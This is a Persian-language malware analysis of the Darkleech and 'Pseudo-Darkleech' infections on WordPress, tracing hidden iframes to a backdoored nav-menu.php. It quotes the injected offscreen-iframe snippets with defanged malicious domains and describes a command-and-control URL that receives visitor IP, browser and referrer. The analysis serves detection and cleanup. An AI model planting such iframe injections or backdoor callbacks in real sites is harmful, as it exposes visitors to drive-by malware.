15 بهم

بد افزار Darkleech وردپرس، علت آلودگی Psuedo-Darkleech

Darkleech یک بدافزار بسیار آلوده تند و تیز است که سرورهای وب را در سطح ریشه آلوده می کند.

این بدافزار از ماژول های آپاچی برای اضافه کردن فریم های پنهان به پاسخ های خاص استفاده می کند.تشخیص آن مشکل است، زیرا بدافزار تنها زمانی فعال است که مدیران سرور و سایت به سیستم وارد نشده اند و iFrame در هر آدرس آی پی فقط یکبار در روز تزریق می شود (و یا یکبار در هفته در برخی نسخه ها).

این به این معنی است که علائم آلودگی به آسانی تکثیر نمی شوند. از آنجایی که این آلودگی در سطح سرور می باشد حتی از طریق کامل ترین اسکن های سطح وب چیزی نشان داده نمی شود و حتی زمانی که فرد مقصر نیز شناسایی شود، صاحبان وب سایت ها ممکن است توانایی حل و فصل موضوع بدون کمک مدیر سرور را نداشته باشند.

با وجود سختی هایی که تشخیص این بدافزار داشته است، کد مخرب که از همان الگوی سال ۲۰۱۲ پیروی می کند قابل تشخیص است:

اعلام یک کلاس css با یک نام تصادفی و موقعیت تصادفی منفی مطلقposition:absolute

یک div از آن کلاس

یک iFrame مخرب با ابعاد تصادفی در داخل div

این موردی است که مشابه آن در سپتامبر ۲۰۱۲ نشان داده شده است:

<style>.tlqvepxi { position:absolute; left:-1648px; top:-1752px} </style> <div class=”tlqvepxi”>

<iframe src=”hxxp://example.com/21234443.html” width=”581″ height=”476″></iframe></div>

———————————————————————————————-

این کد در نوامبر ۲۰۱۴:

<style>.syxq9la69 { position:absolute; left:-1666px; top:-1634px} </style> <div class=”syxq9la69″>

<<iframe src=”hxxp://jsnrgo .ddns .net/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2″ width=”285″ height=”554″></iframe></div>

———————————————————————————————-

نسخه جدیدی از Darkleech

به تازگی کد زیر در برخی از وب سایت های وردپرسی مشاهده شده است:

<style>.cznfvc1d54 { position:absolute; left:-1447px; top:-1785px} </style> <div class=”cznfvc1d54″>

<<iframe src=”hxxp:// dhbxnx .serveftp .com/blog/4c2H?utm_source=g86″ width=”593″ height=”405″></iframe></div>

که همان الگوی قبلی می باشد با این تفاوت که برای فرار از url آی فریم، از مسیر بلاگ blog/4c2H?utm_source=g86 استفاده شده است و نمونه utm_source های دیده شده به قرار زیر است:

utm_source=g86, utm_source=g112, utm_source=g90, utm_source=g98, etc

بدافزار در فایل nav-menu.php :

پس از کارکردن با یک وب سایت آلوده متوجه شدیم که منبع واقعی Darkleech iFrames فایل wp-includes/nav-menu.php در هسته وردپرس آلوده می باشد.

کد رمزگذاری تزریق شده در وسط آن به صورت زیر است:

بدافزار - nav-menu.php

در این نسخه از رمزگشایی، مشخص است که یک بخش backdoor اجازه میدهد تا اجرای کدهای پی اچ پی قبلی در پارامترهای p1 و p2 در هر URL بلاگ انجام شود:

Darkleech iFrames

تست دو لایه:

در اینجا دو لایه تست برای تشخیص اینکه نرم افزار مخرب تزریق شده یا نه، وجود دارد.

لایه اول در اسکریپت ها می باشد که این مورد نوعی پیش آزمایش می باشد. مطمئن شوید که درخواست ها از طرف رباتهای موتورهای جستجو و یا شبکه گوگل نباشد.

لایه دوم بر روی سرور و از طریق remote می باشد. اطلاعات زیر درباره هر درخواستی در پارامترهایURL عبور داده میشود:

hxxp: / /dazzer .slyip .com/ordpm/v2/?export=7f53f8c6c730af6aeb52e66eb74d8507&url=nnnnn&g=ggg :

  • دامنه سایت آلوده

  • آدرس آی پی بازدید کننده

  • مرورگر بازدید کننده (سمت کلاینت)

  • ارجاع Referrer

واضح است که این اطلاعات برای تعیین واجد شرایط بودن/مورد تایید بودن درخواست، مورد استفاده قرار میگیرد. dazzer .slyip .com می تواند آی پی آدرس ها را ردیابی کند و کدهای مخرب را فقط یکبار در یک دوره زمانی معین، به درخواست همان آی پی برگرداند.

رشته های user agent به آنها اطلاع میدهند که آیا بازدیدکنندگان از ورژن آسیب پذیر مرورگری که امکان حمله دارد استفاده میکنند یا خیر. این گزارشات همچنین به آنها کمک میکند که بازدیدکنندگانی که توسط کلیک روی لینک های نتایج جستجو یا شبکه های اجتماعی به سایت مراجعه میکنند را شناسایی کنند.

اگر تمام نیازها برآورده شوند، remote server یک مالور مخرب کدگذاری شده base64-encoded را برای تزریق به صفحات وب برمیگرداند (این کد در nav-menu.php در بالای کدهای اچ تی ام ال قبل از تگ ها قرار میگیرد) اگر درخواست ارسال شده واجد شرایط و مطلوب نباشد،dazzer .slyip .com نمیتواند هیچ چیزی برگرداند و بدافزار نمیتواند کدی را تزریق کند.

بررسی ظرفیت تزریق

این برنامه قطعا مخرب است و رفتارش دقیقا مانند نوعی از نرم افزار مخرب مالور پی اچ پی است. اما آیا واقعا مسئولیتی برای استفاده از Darkleech iFrames وجود دارد؟ یا ممکن است این برنامه از نوع مالورهای مختلف دیگر باشد و پاک کردن آن برای حل مشکل Darkleech کافی نباشد.

یک آزمایش ساده انجام میدهیم: – با استفاده از کدهای مخرب برای آماده سازی یک URL کامل dazzer .slyip .com با همه ی پارامترهای مورد نیاز و ارسال یک درخواست به آن از سرور مختلف پاسخ بازگشتی شامل رشته کد رمزگذاری شده ی base64-encoded میباشد که پس از رمز گشایی مانند تصویر زیر است:

Darkleech

کد Pseudo-darkleech از dazzer .slyip .com

این دقیقا همان کدی است که ما از اول فکر می کردیم متعلق به Darkleech است. شاید شما به پارامترutm_source=g11 در url توجه کرده باشید که با پارامتر g=112 در url مربوط به dazzer .slyip .comیکسان است . این تست ثابت کرده که خطای واقعی در نرم افزار های مخرب، داخل یکی از فایل های وردپرس بوده است،‌ نه از روت سرور.

اشتراک

ارسال نظر